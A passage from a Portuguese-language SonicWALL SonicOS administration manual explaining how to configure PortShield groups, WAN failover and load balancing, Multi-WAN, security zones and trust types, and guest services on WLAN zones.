especificados no intervalo de endereos.
Nota Cada interface do PortShield estaticamente endereada deve estar em uma sub-rede
exclusiva. No possvel sobrepor as interfaces do PortShield em mltiplas sub-redes.
Configurando grupos do PortShield

Os grupos do PortShield podem ser configurados em vrias pginas diferentes na interface de
gerenciamento do SonicOS:
Configurando Interfaces do PortShield em Rede > Interfaces na pgina 253
Configurando Interfaces do PortShield em Rede > Grupos do PortShield na pgina 254
Configurando Interfaces do PortShield em Rede > Interfaces

Para configurar uma interface do PortShield, realize as seguintes etapas:
Etapa 1 Clique na pgina Rede > Interfaces.
Etapa 2 Clique no boto Configurar da interface que voc deseja configurar. A janela Editar interface
ser exibida.
Etapa 3 No menu suspenso Zona, selecione a opo de tipo de zona para a qual voc deseja mapear
a interface.
Nota possvel adicionar interfaces do PortShield somente em zonas Confiveis, P blicas e

Sem fio.
Etapa 4 No menu suspenso Atribuio de IP/modo , selecione Modo do comutador do PortShield.

Etapa 5 No menu suspenso PortShield para, selecione a interface para a qual voc deseja mapear
esta porta. Somente as portas que correspondem zona selecionada sero exibidas.
Configurando Interfaces do PortShield | 253

Configurando Interfaces do PortShield em Rede > Grupos do PortShield
A pgina Rede > Grupos do PortShield exibe uma representao grfica da configurao
atual das interfaces do PortShield.
As interfaces em preto no fazem parte de um grupo do PortShield.

As interfaces em amarelo foram selecionadas para serem configuradas.
As interfaces que so da mesma cor (que no seja preto ou amarelo) fazem parte de um
grupo do PortShield, com a interface principal com um contorno branco em torno da cor.
As interfaces que esto esmaecidas no podem ser adicionadas a um grupo do PortShield.
Na pgina Rede> Grupos do PortShield, possvel agrupar portas manualmente usando a
interface grfica dos Grupos do PortShield. O agrupamento de portas permite que eles
compartilhem uma sub-rede comum, bem como configuraes de zona comuns.
Nota As interfaces devem ser configuradas antes de serem agrupadas com o PortShield.
Para configurar grupos do PortShield, realize as seguintes etapas:
Etapa 1 No grfico, selecione a(s) interface(s) que voc deseja configurar como parte de um grupo do
PortShield. As interfaces ficaro amarelas.
Etapa 2 Clique no boto Configurar.
Etapa 3 No menu suspenso Porta habilitada, selecione se deseja habilitar ou desabilitar as interfaces.
Etapa 4 No menu suspenso PortShield Interface, selecione a interface que deseja atribuir como a
interface principal para essas interfaces do PortShield.
Etapa 5 No menu suspenso Velocidade do link, selecione a velocidade de conexo para as interfaces.

Captulo 14
Configurar failover e balanceamento de
carga
Rede > Failover e balanceamento de carga

Failover e Balanceamento de carga na pgina 255
Estatsticas de balanceamento de carga na pgina 259
Vrias WAN (MWAN) na pgina 259
Failover e Balanceamento de carga

Para o Failover e Balanceamento de carga (LB), membros de vrias WAN so suportados (N
1), onde N o nmero total de interfaces em uma plataforma de hardware. Por exemplo:
Interface Ethernet de WAN primria
WAN alternativa 1
WAN alternativo 2
WAN alternativa <n1> . . .
A Interface Ethernet de WAN primria tem o mesmo significado que conceito de "WAN
primria" do firmware anterior. a interface de WAN de classificao mais alta no grupo de LB.
A WAN alternativa 1 corresponde "WAN secundria", tem uma classificao mais baixa que
a WAN primria, mas tem uma classificao mais alta que as prximas duas alternativas. As
outras, WAN alternativa 2 e WAN alternativa <n1>, so novas, sendo WAN alternativa <n
1> a mais baixa em termos de classificao entre os quatro membros da WAN do grupo de LB.
As configuraes de failover e balanceamento de carga esto descritas abaixo:
Habilitar balanceamento de carga esta opo deve ser habilitada para que o usurio
acesse a seo Grupos de LB e estatsticas de LB da configurao de Failover e
balanceamento de carga. Se estiver desabilitada, no esto disponveis opes para
Failover e balanceamento de carga para configurao.
Responder a investigaes quando a opo est habilitada, o dispositivo pode
responder a pacotes de solicitao de investigao que cheguem a qualquer uma das
interfaces do dispositivo.
Configurar failover e balanceamento de carga | 255

Qualquer TCP-SYN para porta esta opo est disponvel quando a opo Responder
a investigaes est habilitada. Quando selecionada, o dispositivo responder somente
a pacotes de solicitao de investigao TCP com o mesmo nmero de porta TCP de
endereo de destino de pacote que o valor configurado.
Realizar o balanceamento de carga de membros e grupos

Os membros de LB adicionados a um grupo de LB assumem determinadas "funes". Um
membro s pode trabalhar em uma das funes a seguir:
Primrio apenas um membro pode ser o Primrio por Grupo. Este membro sempre
aparece primeiro ou na parte superior da lista de membros. Observe que, embora um grupo
possa ser configurado com uma lista de membros vazia, impossvel ter membros sem um
Primrio.
Alternativo mais de um membro pode ser Alternativo, no entanto, no possvel ter um
Grupo de membros somente Alternativos.
ltimo recurso apenas um membro pode ser projetado como ltimo recurso. O ltimo
recurso s pode ser configurado com outros membros do grupo.
Cada membro em um grupo tem uma classificao. Os membros so exibidos por ordem
decrescente de classificao. A classificao determinada pela ordem de interfaces como
aparecem na lista de membros do grupo. A ordem importante para determinar as
preferncias de uso das interfaces, bem como o nvel de precedncia dentro do grupo. Assim,
duas interfaces dentro de um grupo no tero a mesma classificao; cada interface ter uma
classificao distinta.

Guia Geral
Para definir as configuraes de Classificao de membros do grupo, clique no cone
Configurar do Grupo que voc deseja configurar na pgina Rede > Failover e LB. A tela da
guia Geral ser exibida.
A guia Geral permite que o usurio modifique as configuraes a seguir:

Nome de exibio edite o nome de exibio do Grupo
Tipo (ou mtodo) de LB escolha o tipo de LB na lista suspensa (Failover ativo/passivo
bsico, Round Robin, Com base em spillover ou Com base na porcentagem).
Failover ativo/passivo bsico as quatro interfaces de WAN usam a "classificao"
para determinar a ordem de preempo quando a caixa de seleo Preempo for
habilitada. Somente uma interface com uma classificao superior pode realizar a
preempo de uma interface de WAN ativa.
Round Robin esta opo agora permite que o usurio reordene as interfaces de
WAN para seleo de Round Robin. A ordem a seguinte: WAN primria, WAN
alternativa 1, WAN alternativa 2 e WAN alternativa 3; o Round Robin ser novamente
repetido para a WAN primria e a ordem continuar.
Transbordo o limite de largura de banda se aplica WAN primria. Depois que o
limite seja excedido, novos fluxos de trfego so alocados s Alternativas de uma
maneira Round Robin. Depois de a largura de banda de WAN primria ficar abaixo do
limite configurado, o Round Robin para e comearo sendo enviados novos fluxos de
sada somente atravs da WAN primria. Observe que os fluxos existentes
permanecero associados s Alternativas (pois j esto em cache) at que o tempo
limite seja atingido normalmente.

Taxa existem agora quatro campos para que possam ser definidas porcentagens
para cada WAN no grupo de LB. Para evitar problemas associados a erros de
configurao, certifique-se de que a porcentagem corresponda corretamente
interface de WAN indicada.
Adicionar/excluir interfaces de membros podem ser adicionados membros selecionando
uma interface exibida na coluna "Membros do grupo:" e, em seguida, clicando no boto
Adicionar>>. Observe que a interface listada na parte superior da lista a Primria. Os
membros podem ser excludos da coluna "Selecionado(s):" selecionando a interface
exibida e, em seguida, clicando no boto Remover>>.
Nota A classificao da interface no especifica a operao que ser executada no membro

individual. A operao que ser executada especificada pelo Tipo de grupo.
Guia Investigao
Quando a investigao lgica est habilitada, os pacotes de teste podem ser enviados para
destinos de investigao remotos para verificar a disponibilidade do caminho de WAN. Foi
fornecida uma nova opo para permitir a investigao por meio das interfaces de WAN
adicionais: WAN alternativa 3 e WAN alternativa 4.
Nota As VLANs para WANs alternativas no suportam encerramento de VPN ou QoS.
Para configurar as opes de investigao para um Grupo especfico, clique no cone

Configurar do Grupo que deseja configurar na pgina Rede > Failover e LB. Em seguida,
clique na guia Investigao.
A guia Investigao permite ao usurio modificar as configuraes a seguir:

Verificar interface o intervalo de verificaes de integridade em unidades de segundos
Desativar interface depois de uma srie de verificaes de integridade falhadas, a
interface definida como "Failover"
Reativar interface depois de uma srie de verificaes de integridade com xito, a
interface definida como "Disponvel"
Investigar responder.global.sonicwall.com em todas as interfaces neste grupo
habilite esta caixa de seleo para definir automaticamente o Monitoramento lgico/de
investigao em todas as interfaces do Grupo. Quando habilitada, ela envia pacotes de
investigao TCP para o host SNWL global que responde a pacotes TCP SNWL,
responder.global.sonicwall.com, usando um endereo de destino de investigao de
destino de 204.212.170.23:50000. Uma vez marcada esta caixa de seleo, a restante
configurao da investigao habilitar automaticamente configuraes internas. A

mesma investigao ser aplicada s quatro interfaces de Ethernet de WAN. Observe que
a configurao de investigao de WAN de discagem tambm tem as configuraes
internas padro.
Estatsticas de balanceamento de carga

A tabela Estatsticas de balanceamento de carga exibe as seguintes estatsticas de grupo
de LB do firewall:
Total de conexes
Nova conexo
Taxa atual
Taxa mdia
Total de bytes de unicast
Unicast Rx
Bytes Rx
Unicast Tx
Bytes Tx
Processamento (KB/s)
Processamento (Kbits/s)
No menu suspenso Exibir estatsticas para, selecione para qual grupo de LB voc deseja
exibir estatsticas.
Clique no boto Limpar estatsticas na parte inferior direita da pgina Rede > Failover e LB
para limpar as informaes da tabela Estatsticas de balanceamento de carga.
Vrias WAN (MWAN)

O recurso Vrias WAN (MWAN) permite que o administrador configure todas as interfaces do
dispositivo, exceto uma, para roteamento de rede de WAN (uma interface deve permanecer
configurada para a zona de LAN para administrao local). Todas as interfaces de WAN podem
ser investigadas usando o host Respondente global SNWL.

Interfaces de rede
A pgina Interfaces de rede permite que mais de duas interfaces de WAN sejam configuradas
para roteamento. possvel configurar interfaces de WAN na pgina Interfaces de rede, mas
no possvel inclu-las no Failover e LB. Somente a Interface Ethernet de WAN primria
necessria para fazer parte do grupo de LB sempre que o LB for habilitado. Qualquer interface
de WAN que no pertena ao grupo de LB no est includa na funo de LB, mas executa
funes normais de roteamento de WAN.
Nota Uma interface de WAN virtual pode pertencer ao grupo de LB. No entanto, antes de usar
dentro do grupo de LB, certifique-se de que a rede de WAN virtual seja totalmente rotevel
como a de uma WAN fsica.

Rotear os gateways padro e secundrio
Como os objetos de endereos de gateway anteriormente associados WAN primria e WAN
secundria foram substitudos, ser necessrio recriar rotas estticas configuradas pelo
usurio para usar os objetos de endereos de gateway corretos associados s interfaces de
WAN. Isso ter de ser configurado manualmente como parte do procedimento de atualizao
do firmware.
O Gateway padro do objeto de endereo antigo corresponde ao gateway padro associado

WAN primria no grupo de LB. O Gateway padro secundrio corresponde ao gateway padro
associado WAN alternativa 1.
Nota Depois de adicionar novamente as rotas, exclua as antigas referindo-se aos Gateways
padro e secundrio.
Nota Dependendo do seu local, alguns Servidores DNS podem responder mais rapidamente que
outros. Verifique se esses servidores funcionam corretamente antes de usar o seu
dispositivo de segurana Dell SonicWALL.

Captulo 15
Configurar zonas de rede
Rede > Zonas

Uma zona um agrupamento lgico de uma ou mais interfaces projetadas para tornar o
gerenciamento, como a definio e a aplicao de Regras de acesso, um processo mais
simples e intuitivo do que seguir o esquema estrito de interface fsica. A segurana baseada
em zona um mtodo poderoso e flexvel de gerenciamento de segmentos de redes interna e
externa, permitindo que o administrador separe e proteja recursos essenciais da rede interna
contra acesso no aprovado ou ataque.
Uma zona de segurana de rede simplesmente um mtodo lgico de agrupamento de uma

ou mais interfaces com nomes amigveis configurveis pelo usurio e de aplicao de regras
de segurana medida que o trfego passa de uma zona para outra zona. As zonas de
segurana fornecem uma camada adicional, mais flexvel, de segurana do firewall. Com a
segurana baseada em zona, o administrador pode agrupar interfaces semelhantes e aplicar
as mesmas polticas nelas, em vez de ter de gravar a mesma poltica para cada interface. Para
obter mais informaes sobre a configurao de interfaces, consulte Rede > Interfaces na
pgina 185.
Configurar zonas de rede | 263

As zonas do SonicOS permitem que voc aplique polticas de segurana no interior da rede.
Isso permite que o administrador faa isso organizando recursos de rede para diferentes zonas
e permitindo ou restringindo o trfego entre essas zonas. Dessa forma, o acesso a recursos
internos essenciais, como servidores da folha de pagamento ou servidores de cdigo de
engenharia, pode ser estritamente controlado.
As zonas tambm permitem exposio total da tabela de NAT para permitir o controle do
administrador sobre o trfego nas interfaces, controlando os endereos de origem e destino
medida que o trfego passa de uma zona para outra. Isso significa que a NAT pode ser
aplicada internamente ou atravs de tneis de VPN, sendo esse um recurso j muito solicitado
pelos usurios. Os firewalls tambm podem orientar o trfego VPN por meio da poltica de NAT
e poltica de zona, pois as VPNs esto agora agrupadas de forma lgica em suas prprias
zonas de VPN.
Como funcionam as zonas

Uma forma fcil de visualizar como as zonas de segurana funcionam imaginar um grande
edifcio novo, com vrias divises e um grupo de novos funcionrios que no conhece o
edifcio. Esse edifcio tem uma ou mais sadas que podem ser consideradas como interfaces
de WAN. As divises dentro do edifcio tm uma ou mais portas que podem ser consideradas
como interfaces. Pode considerar-se que essas divises consideradas como zonas dentro de
cada diviso so um nmero de pessoas. As pessoas so categorizadas e atribudas a
divises separadas no edifcio. As pessoas em cada diviso que se dirigem para outra diviso
ou saem do edifcio devem falar com um porteiro sada de cada sala. Este porteiro a poltica
de segurana entre zonas/dentro de zonas e a funo dele consultar uma lista e certificar-se
de que a pessoa tenha permisso para se dirigir para outra sala ou sair do edifcio. Se a pessoa
tiver permisso (ou seja, se a poltica de segurana atribuir permisso), ela pode sair da
diviso pela porta (a interface).
Aps entrar no corredor, a pessoa precisa consultar o responsvel do corredor para descobrir
onde a sala ou onde se encontra a porta para sair do edifcio. Este responsvel do corredor
fornece o processo de roteamento porque ele sabe onde todas as salas esto localizadas e
como entrar e sair do edifcio. O monitor tambm sabe os endereos de qualquer um dos
escritrios remotos que podem ser considerados VPNs. Se o edifcio possuir mais de uma
entrada/sada (interfaces de WAN), o responsvel do corredor pode direcionar pessoas para
usar a entrada/sada secundria, dependendo do modo que foi indicado (ou seja, somente em
caso de emergncia ou para distribuir o trfego recebido e enviado da entrada/sada). Essa
funo pode ser considerada como o balanceamento de carga de WAN.
H momentos em que as divises dentro do edifcio tm mais de uma porta e outros momentos
em que h grupos de pessoas na diviso que no esto familiarizadas entre si. Neste exemplo,
um grupo de pessoas usa apenas uma porta e outro grupo usa a outra porta, mesmo estando
os grupos na mesma diviso. Como as pessoas tambm no se reconhecem, para falar com
algum em outro grupo, os usurios devem pedir ao porteiro (a poltica de segurana) para
indicar a pessoa do outro grupo com a qual desejam falar. O porteiro tem a opo de no
permitir que um grupo de pessoas converse com os outros grupos na diviso. Este um
exemplo de quando as zonas tm mais de uma interface ligada a elas e quando o trfego
dentro das zonas no permitido.
Por vezes, as pessoas desejaro visitar escritrios remotos e podero chegar pessoas de
escritrios remotos para visitar pessoas em divises especficas no edifcio. Estes so os
tneis de VPN. Os responsveis do corredor e da entrada verificam se tal ou no permitido
e permitem o trfego. O porteiro tambm pode optar por forar pessoas a colocar um disfarce
antes de viajar para outra sala, para a sada ou para outro escritrio remoto. Isso oculta a
identidade verdadeira da pessoa, mascarando a pessoa como outra diferente. Esse processo
pode ser considerado como a poltica de NAT.

Zonas predefinidas
As zonas predefinidas no seu firewall dependem do dispositivo. As zonas de segurana
predefinidas no dispositivo de segurana Dell SonicWALL no so modificveis e esto
definidas como se segue:
DMZ: Esta zona normalmente usada para servidores publicamente acessveis. Esta zona
pode ser composta por uma a quatro interfaces, dependendo do design da sua rede.
LAN: Essa zona pode ser composta por vrias interfaces, dependendo do design da sua
rede. Embora cada interface tenha uma sub-rede de rede diferente conectada a ela,
quando so agrupadas podem ser gerenciadas como uma nica entidade.
MGMT: Esta zona usada para gerenciamento de dispositivos e inclui somente a interface
de MGMT. As interfaces em outras zonas tambm podem ser habilitadas para o
gerenciamento de SonicOS, mas a interface/zona de MGMT fornece a segurana adicional
de uma zona separada apenas para gerenciamento.
DIFUSO SELETIVA: Esta zona oferece suporte para difuso seletiva de IP, que um
mtodo de envio de pacotes de entrada de uma nica origem simultaneamente para vrios
hosts.
SSLVPN: Esta zona usada para proteger o acesso remoto usando o cliente NetExtender
da Dell SonicWALL.
VPN: Esta zona virtual usada para simplificar a conectividade remota e segura.
WLAN: Esta zona oferece suporte aos SonicPoints da SonicWALL. Quando atribuda
porta Opt, ela realiza a imposio do SonicPoint, descartando automaticamente todos os
pacotes recebidos de dispositivos no SonicPoint. A zona de WLAN suporta o Protocolo
de descoberta do SonicPoint (SDP) para pesquisar e identificar SonicPoints conectados
automaticamente. Ela tambm suporta o Protocolo de provisionamento simples da
SonicWALL para configurar os SonicPoints usando perfis.
WAN: Essa zona pode consistir em vrias interfaces. Se voc estiver usando o recurso de
failover de WAN do dispositivo de segurana, voc precisar adicionar a segunda interface
da Internet zona de WAN.
Nota Mesmo que voc possa agrupar interfaces em uma zona de segurana, isso no impede
que voc efetue o endereamento de uma nica interface dentro da zona.
Tipos de segurana
Cada zona tem um tipo de segurana que define o nvel de confiana atribudo a essa zona.
Existem seis tipos de segurana:
Confivel: Confivel um tipo de segurana que oferece o mais alto nvel de confiana, o
que significa que o mnimo de fiscalizao aplicado ao trfego proveniente de zonas
confiveis. A segurana confivel pode ser considerada como estando no lado da LAN
(protegido) do dispositivo de segurana. A zona de LAN sempre Confivel.
Gerenciamento: O tipo de segurana de Gerenciamento exclusivo para a zona de
MGMT e para a interface de MGMT e tambm fornece o mais alto nvel de confiana.
Criptografado: Criptografado um tipo de segurana usado exclusivamente por zonas de
VPN e SSLVPN. Todo o trfego para e de uma zona Criptografada est criptografado.
Sem fio: Sem fio um tipo de segurana aplicado zona de WLAN ou a qualquer zona
onde a nica interface para a rede consiste em dispositivos SonicPoint da SonicWALL. O
tipo de segurana sem fio projetado especificamente para uso com dispositivos
SonicPoint. Colocar uma interface em uma zona sem fio ativa o SDP (Protocolo de
descoberta da SonicWALL) e o SSPP (Protocolo de provisionamento simples da

SonicWALL) nessa interface para a descoberta e o provisionamento automticos de
dispositivos SonicPoint. Somente o trfego que passa por um SonicPoint permitido por
meio de uma zona sem fio. Todo o trfego restante ser descartado.
Pblico: Um tipo de segurana Pblico oferece um nvel mais alto de confiana do que
uma zona No confivel, mas um nvel mais baixo de confiana do que uma zona
Confivel. As zonas pblicas podem ser consideradas como sendo uma rea segura entre
o lado da LAN (protegido) do dispositivo de segurana e o lado da WAN (desprotegido). A
DMZ, por exemplo, uma zona pblica porque o trfego flui dele para a LAN e a WAN. Por
padro, o trfego de DMZ para LAN negado. Mas o trfego de LAN para QUALQUER
permitido. Isso significa que somente conexes iniciadas pela LAN tero o trfego entre
DMZ e LAN. A DMZ somente ter acesso padro WAN, no LAN.
No confivel: O tipo de segurana No confivel representa o nvel mais baixo de
confiana. Ele usado pela WAN e pela zona de difuso seletiva virtual. Uma zona No
confivel pode ser considerada como estando no lado da WAN (desprotegido) do
dispositivo de segurana. Por padro, no permitida a entrada de trfego de zonas No
confiveis em qualquer outro tipo de zona sem regras explcitas, mas o trfego de tipos de
zonas alternados permitido em zonas No confiveis.
Permitir confiana de interface

A configurao Permitir confiana de interface na janela Adicionar zona automatiza a
criao de Regras de acesso para permitir que o trfego flua entre a interface de uma instncia
de zona. Por exemplo, se a zona de LAN possuir as interfaces LAN e X3 associadas a ela, a
marcao de Permitir confiana de interface na zona de LAN vai criar as Regras de acesso
necessrias para permitir que os hosts nessas interfaces comuniquem entre eles.
Habilitar servios de segurana SonicWALL em zonas

Voc pode habilitar servios de segurana SonicWALL para o trfego entre zonas. Por
exemplo, voc pode habilitar o servio de preveno de intruso da SonicWALL para trfego
de entrada e sada na zona de WLAN para adicionar mais segurana ao trfego de rede
interno. Voc pode habilitar os seguintes servios de segurana SonicWALL em zonas:
Impor servio de filtragem de contedo impe a filtragem de contedo em vrias
interfaces nas mesmas zonas Confivel, Pblica e WLAN.
Impor o Client Anti-Virus Service impe a proteo antivrus em vrias interfaces nas
mesmas zonas Confivel, Pblica ou WLAN.
Habilitar antivrus do gateway impe a proteo antivrus do gateway em vrias
interfaces nas mesmas zonas Confivel, Pblica ou WLAN.
Habilitar IPS impe a deteco e a preveno de intruses em vrias interfaces nas
Habilitar o servio de controle de aplicativos impe servios de poltica de controle
de aplicativos em vrias interfaces nas mesmas zonas Confivel, Pblica ou WLAN.
Habilitar servio anti-spyware impe deteco e preveno anti-spyware em vrias
Impor o Global Security Client impe a proteo Global Security Client (GSC) em
vrias interfaces nas mesmas zonas Confivel, Pblica ou WLAN.
Criar VPN de grupo cria uma poltica de VPN de grupo para a zona, a qual exibida na
tabela Polticas de VPN na pgina VPN > Configuraes. Voc pode personalizar a
poltica VPN de grupo na pgina VPN > Configuraes. Se voc desmarcar Criar VPN de
grupo, a poltica VPN de grupo removida da pgina VPN > Configuraes.

Habilitar controle de SSL habilita o controle de SSL na zona. Todas as novas conexes
SSL iniciadas a partir dessa zona estaro agora sujeitas a inspeo. O controle de SSL
deve ser habilitado primeiro globalmente na pgina Firewall > Controle de SSL.
Habilitar acesso a SSLVPN habilita o acesso remoto seguro a SSLVPN na zona.
A tabela de configuraes de zona

A tabela Configuraes de zona mostra uma lista de todas as zonas predefinidas padro do
firewall, bem como todas as zonas que voc criar. A tabela exibe as seguintes informaes de
status sobre a configurao de cada zona:
Nome: Lista o nome da zona. Os nomes predefinidos de zonas LAN, WAN, WLAN, VPN
e Criptografado no podem ser alterados.
Tipo de segurana: Exibe o tipo de segurana: Confivel, No confivel, Pblico, Sem
fio ou Criptografado.
Interfaces de membros: Exibe as interfaces que so membros da zona.
Confiana de interface: Uma marca de seleo indica que a configurao Permitir
confiana de interface est habilitada para a zona.
Filtragem de contedo: Uma marca de seleo indica que o servio de filtragem de
contedo da SonicWALL est habilitado para trfego de entrada e sada da zona.
Client Anti-Virus: Uma marca de seleo indica que o Client Anti-Virus da SonicWALL
est habilitado para o trfego de entrada e sada da zona. O Client Anti-Virus da
SonicWALL gerencia um aplicativo de cliente antivrus em todos os clientes na zona.
Antivrus no gateway: Uma marca de seleo indica que o Antivrus do gateway da
SonicWALL est habilitado para o trfego de entrada e sada da zona. O Antivrus do
gateway da SonicWALL gerencia o servio de antivrus no firewall.
Servio anti-spyware: Uma marca de seleo indica se a deteco e a preveno de Anti-
spyware da SonicWALL esto habilitadas para o trfego por meio de interfaces na zona.
IPS: Uma marca de seleo indica que o servio de preveno de intruso da SonicWALL
est habilitado para trfego de entrada e sada da zona.
Controle de aplicativos: Uma marca de seleo indica que o servio de controle de
aplicativos est habilitado para trfego de entrada e sada da zona.
GSC: Uma marca de seleo indica que o Global Security Client est habilitado para o
trfego de entrada e sada da zona. O GSC da SonicWALL gerencia um aplicativo antivrus
de cliente e um aplicativo de cliente de VPN em todos os clientes na zona.

Controle de SSL: Uma marca de seleo indica que o Controle de SSL est habilitado
para o trfego de entrada e sada da zona. Todas as novas conexes SSL iniciadas a partir
dessa zona estaro agora sujeitas a inspeo.
Acesso a SSLVPN: Uma marca de seleo indica que o acesso remoto seguro de SSL
VPN est habilitado para trfego de entrada e sada da zona.
Configurar: Se clicar no cone , ser exibida a janela Editar zona. Se clicar no cone
de excluso , a zona ser excluda. O cone de excluso ficar esmaecido para as zonas
predefinidas. Voc no pode excluir essas zonas.
Adicionar uma nova zona

Para adicionar uma nova zona, clique em Adicionar na tabela Configuraes de zona. A
janela Adicionar zona exibida.
Etapa 1 Digite um nome para a nova zona no campo Nome.

Etapa 2 Selecione um tipo de segurana Confivel, Pblico ou Sem fio no menu Tipo de segurana.
Use Confivel para zonas s quais voc deseja atribuir o mais alto nvel de confiana, como
segmentos de LAN interna. Use Pblico para zonas com um nvel mais baixo de requisitos de
confiana, como uma interface de DMZ. Use Sem fio para a interface de WLAN.
Etapa 3 Se voc deseja permitir comunicaes entre zonas, selecione Permitir confiana de
interface. Se no desejar, marque a caixa de seleo Permitir confiana de interface.
Etapa 4 Para que o SonicOS crie automaticamente regras de acesso entre esta zona e outras zonas
de vrios tipos de segurana, marque as caixas de seleo desejadas de Gerar
automaticamente regras de acesso.
Etapa 5 Selecione qualquer um dos servios de segurana do firewall voc deseja impor na zona. Voc
pode selecionar o seguinte:
Impor servio de filtragem de contedo impe a filtragem de contedo em vrias
interfaces nas mesmas zonas Confivel, Pblica e WLAN. Para aplicar uma poltica de
Servio de filtragem de contedo (CFS) na zona, selecione a poltica no menu
suspenso Poltica de CFS.
Habilitar imposio do AV cliente impe a proteo antivrus de cliente em vrias
interfaces nas mesmas zonas Confivel, Pblica ou WLAN, usando o cliente de
antivrus do cliente em seus hosts de rede.
Habilitar servio de antivrus do gateway impe a proteo antivrus do gateway
no seu firewall para todos os clientes conectados a esta zona. O Antivrus do gateway
da SonicWALL gerencia o servio de antivrus no firewall.
Habilitar IPS impe a deteco e a preveno de intruses em vrias interfaces nas
Habilitar o servio de controle de aplicativos impe servios de poltica de
controle de aplicativos em vrias interfaces nas mesmas zonas Confivel, Pblica ou
WLAN.
Habilitar servio anti-spyware impe deteco e preveno anti-spyware em vrias
Criar VPN de grupo cria automaticamente uma poltica de VPN de grupo da
SonicWALL para esta zona. Voc pode personalizar a Poltica de VPN de grupo na
pgina VPN > Configuraes.

Cuidado Se desabilitar a caixa de seleo Criar VPN de grupo, qualquer poltica de VPN de grupo
correspondente ser removida.
Habilitar controle de SSL habilita o controle de SSL na zona. Todas as novas

conexes SSL iniciadas a partir dessa zona estaro agora sujeitas a inspeo.
Observe que o controle de SSL deve ser habilitado primeiro globalmente na pgina
Firewall > Controle de SSL. Para obter mais informaes, consulte Configuraes de
firewall > Controle SSL na pgina 743.
Habilitar acesso a SSLVPN habilita o acesso remoto seguro a SSLVPN na zona.
Etapa 6 Clique em OK. A nova zona agora adicionada ao firewall.
Excluir uma zona

Voc pode excluir uma zona criada por usurio clicando no cone de excluso na coluna
Configurar. O cone Excluir est indisponvel para as zonas predefinidas. Voc no pode
excluir essas zonas. Quaisquer zonas que voc criar podem ser excludas.
Configurar uma zona para acesso de convidado

Os servios para convidados de usurio da SonicWALL fornecem aos administradores de rede
uma soluo simples para a criao de passes para convidados com e sem fio e/ou acesso
rede somente de Internet bloqueado para os visitantes ou ns de rede no confiveis. Essa
funcionalidade pode ser estendida a usurios com ou sem fio na zona de WLAN, LAN, DMZ ou
pblica/semipblica de sua preferncia.
Para configurar o recurso Servios para convidados:

Etapa 1 Navegue at a pgina Rede > Zonas na interface de gerenciamento do SonicOS.
Etapa 2 Clique no boto Configurar da zona qual deseja adicionar os Servios para convidados.
Etapa 3 Clique na guia Servios para convidados. Escolha entre as seguintes opes de
configurao para Servios para convidados:
Habilitar servios para convidados habilita servios para convidados na zona de
WLAN.
Habilitar comunicao entre convidados permite que os convidados comuniquem
diretamente com outros usurios que esto conectados a esta zona.
Ignorar verificao de AV para convidados permite que o trfego de convidados
ignore a proteo antivrus.
Habilitar autenticao de convidados externos requer que os convidados
conectando a partir do dispositivo ou rede que voc selecionar se autentiquem antes
de obter acesso.
Habilitar pgina de poltica sem autenticao direciona os usurios para uma
pgina de poltica de uso de servios para convidados que no exige autenticao.
Clique em Configurar para configurar uma pgina de uso de polticas personalizveis
de HTML.
Pgina Autenticao personalizada redireciona os usurios para uma pgina de
autenticao personalizada quando eles se conectam pela primeira vez rede. Clique
em Configurar para configurar a pgina de autenticao personalizada. Insira um URL
para uma pgina de autenticao ou uma instruo de desafio personalizada no campo
de texto e clique em OK.
Pgina de ps-autenticao direciona os usurios para a pgina especificada
imediatamente aps autenticao com xito. Insira um URL para a pgina de ps-
autenticao no campo.

Ignorar autenticao de convidados permite que o recurso Servios para
convidados se integre em ambientes j usando alguma forma de autenticao de nvel
de usurio. Esse recurso automatiza o processo de autenticao, permitindo que os
usurios sem fio acessem recursos Servios para convidados sem precisar de
autenticao. Este recurso s deve ser usado quando o acesso irrestrito de Servios
para convidados for desejado ou quando outro dispositivo upstream estiver impondo
autenticao.
Redirecionar trfego SMTP para redireciona trfego SMTP de entrada nesta zona
para um servidor SMTP que voc especificar. Selecione o objeto de endereo para o
qual redirecionar o trfego.
Negar redes bloqueia trfego para as redes que voc nomear. Selecione a sub-rede,
o grupo de endereos ou o endereo IP para bloquear trfego.
Aprovar redes permite trfego por meio da zona habilitada por Servios para
convidados para as redes que voc selecionar.
Mximo de convidados especifica o nmero mximo de usurios convidados com
permisso para conexo a esta zona. A configurao padro 10.
Recursos especiais dos servios para convidados para zonas sem fio
Habilitar converso dinmica de endereos (DAT) os Servios para convidados
fornecem acesso a "hotspots" no momento a convidados e visitantes sem fio. Para fcil
conectividade, os Servios para convidados permitem que usurios sem fio se
autentiquem e associem, obtenham as configuraes de IP e autentiquem usando
qualquer navegador da Web. Sem DAT, se um usurio convidado no for um cliente de
DHCP, mas em vez disso possuir configuraes de IP esttico incompatveis com as
configuraes de rede WLAN sem fio, a conectividade de rede ser impedida at que
as configuraes do usurio sejam alteradas para valores compatveis. A converso
de endereo dinmico (DAT) uma forma de converso de endereo de rede (NAT)
que permite que o sistema suporte qualquer esquema de endereamento IP para
usurios convidados. Por exemplo, a interface de WLAN sem fio configurada com
seu endereo padro de 172.16.31.1 e um cliente convidado tem um endereo IP
esttico de 192.168.0.10 e um gateway padro de 192.168.0.1, enquanto o outro tem
um endereo IP esttico de 10.1.1.10 e um gateway de 10.1.1.1, permitindo a DAT a
comunicao de rede para esses dois clientes.
Etapa 4 Clique em OK para aplicar essas configuraes para esta zona.
Configurar a zona de WLAN

Etapa 1 Clique no cone Editar da zona de WLAN. A janela Editar zona exibida.
Etapa 2 Na guia Geral, selecione a configurao Permitir confiana de interface para automatizar a
criao de Regras de acesso para permitir que o trfego flua entre as interfaces de uma
instncia da zona. Por exemplo, se a zona de LAN possuir as interfaces LAN e X3 associadas
a ela, a marcao de Permitir confiana de interface na zona de LAN vai criar as Regras de
acesso necessrias para permitir que os hosts nessas interfaces comuniquem entre eles.
Etapa 3 Habilite servios de segurana na zona de WLAN.
Etapa 4 Clique na guia Sem fio. Na seo Configuraes sem fio, marque Apenas permitir trfego
gerado por um SonicPoint para permitir que somente trfego de SonicPoints da SonicWALL
entre na interface da zona de WLAN. Isso permite segurana mxima de sua WLAN.
Desmarque esta opo se desejar permitir qualquer trfego em sua zona de WLAN
independentemente de ser ou no de uma conexo sem fio.

Dica Desmarque Apenas permitir trfego gerado por um SonicPoint e use a zona em uma
interface com fio para permitir servios para convidados nessa interface.
Etapa 5 Selecione Imposio de VPN SSL para exigir que todo o trfego que entra na zona de WLAN
seja autenticado por meio de um dispositivo SRA da SonicWALL.
Etapa 6 Na lista Servidor SSL VPN, selecione um objeto de endereo para direcionar o trfego para o
